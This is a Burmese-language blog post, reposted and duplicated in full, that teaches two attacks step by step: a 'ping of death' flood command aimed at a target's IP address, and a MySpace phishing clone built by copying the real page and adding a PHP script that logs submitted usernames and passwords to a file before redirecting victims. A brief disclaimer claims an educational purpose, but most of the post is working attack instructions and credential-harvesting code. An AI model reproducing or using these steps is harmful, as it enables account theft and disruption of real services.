Popular Posts

ဟက္ကာေတြလုပ္ပံုလုပ္နည္းေတြ...

ကိုလင္း-သာလႅာ၀တီ ပို႕အား ကူးယူေဖာ္ျပေပးထားျခင္းျဖစ္ပါသည္ ......
က်ေနာ္ သိမ္းဆည္ထားတဲ့ နည္းပညာ မွတ္စုထဲက တစ္ခ်ဳိ႕ကို ျပန္ဖြ ...အဲ ျပန္မွ်လိုက္ပါတယ္.. ကိုယ္လုပ္သမွ် ကိုယ္ခံၾကပါ...

- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္

ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္

ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…

- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္

- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့

၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္

၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address

- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္

၁. CMD ကိုဖြင့္ပါ

၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)

၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။

- စတင္တိုက္ခိုက္ျခင္း

၁. CMD ကိုဖြင့္ပါ။

၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္

လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)

Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address

ကိုရိုက္ထည္႕ရပါမည္။

-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္

ကိုေျပာင္းလဲႏိုင္ပါတယ္

-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္

မွာလည္းကိုေျပာျခင္းပါတယ္

သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။

- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။



အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။တစ္စုံတစ္ဦးကိုနစ္နာ လိုေသာရည္ရြယ္ခ်က္မရိွပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္ တတ္ရန္အတြက္သာျဖစ္ပါသည္။



Phishing ဆိုတာဘာလည္း ?

Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး



Web site အတုဆိုတာကိုနားမလည္ဘူး

Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။



ဘာလို႕ဖန္တီးတာလည္း ?

ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…

အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့



ဘယ္လိုဖန္တီးမွာလည္း ?

ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ

MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com/ ကိုသြားပါ



Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါအခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ

အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္

Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ



Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ

Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ

Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ

Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ

www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္


header (’Location: http://myspace.com/ ‘);

$handle = fopen(”log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါေနာက္ upload လုပ္ပါ


Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို notepad နဲ႕ဖြင့္ပါ။

action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password

ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့ E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ

index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။

action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။

အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..။


Photo: ဟက္ကာေတြလုပ္ပံုလုပ္နည္းေတြ...



က်ေနာ္ သိမ္းဆည္ထားတဲ့ နည္းပညာ မွတ္စုထဲက တစ္ခ်ဳိ႕ကို ျပန္ဖြ ...အဲ ျပန္မွ်လိုက္ပါတယ္.. ကိုယ္လုပ္သမွ် ကိုယ္ခံၾကပါ...

- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္

ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္

ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…

- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္

- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့

၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္

၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address

- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္

၁. CMD ကိုဖြင့္ပါ

၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)

၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။

- စတင္တိုက္ခိုက္ျခင္း

၁. CMD ကိုဖြင့္ပါ။

၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္

လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)

Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address

ကိုရိုက္ထည္႕ရပါမည္။

-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္

ကိုေျပာင္းလဲႏိုင္ပါတယ္

-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္

မွာလည္းကိုေျပာျခင္းပါတယ္

သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။

- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။

 

အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။တစ္စုံတစ္ဦးကိုနစ္နာ လိုေသာရည္ရြယ္ခ်က္မရိွပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္ တတ္ရန္အတြက္သာျဖစ္ပါသည္။

 

Phishing ဆိုတာဘာလည္း ?

Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး

 

Web site အတုဆိုတာကိုနားမလည္ဘူး

Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။

 

ဘာလို႕ဖန္တီးတာလည္း ?

ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…

အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့

 

ဘယ္လိုဖန္တီးမွာလည္း ?

ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ

MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ

 

Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါအခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ

အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္

Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ

 

Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ

Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ

Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ

Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ

www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္


header (’Location: http://myspace.com ‘);

$handle = fopen(”log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါေနာက္ upload လုပ္ပါ


Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို notepad နဲ႕ဖြင့္ပါ။

action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password

ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့ E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ

index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။

 action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။

 အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..။

No comments:

Post a Comment

Nattalin Township

သူရိယ အလင္း - လိုင္းေပါင္းစံု

ေရာင္ေတာ္ဖြင့္လူငယ္အဖြဲ႕ လွုပ္ရွားမွု(နတ္တလင္းၿမိဳ႕)

HEART TO HEART

ဟိတကာရီ နာေရးကူညီမွုအသင္း

DoReMe

Pyithu Hluttaw - ျပည္သူ႔လႊတ္ေတာ္

ရဲဇာနည္

Eleven Media Group

Shwemyanmar media group

Health Articles

အိပ္ေရးပ်က္တဲ့ညမ်ား

ေနာက္တစ္ၾကိမ္ လာလည္ဖို႕ ဖိတ္ေခၚပါတယ္ ဆက္လက္ၾကိဳးစားေပးပါမယ္ .... တာရာ ပြႀကီး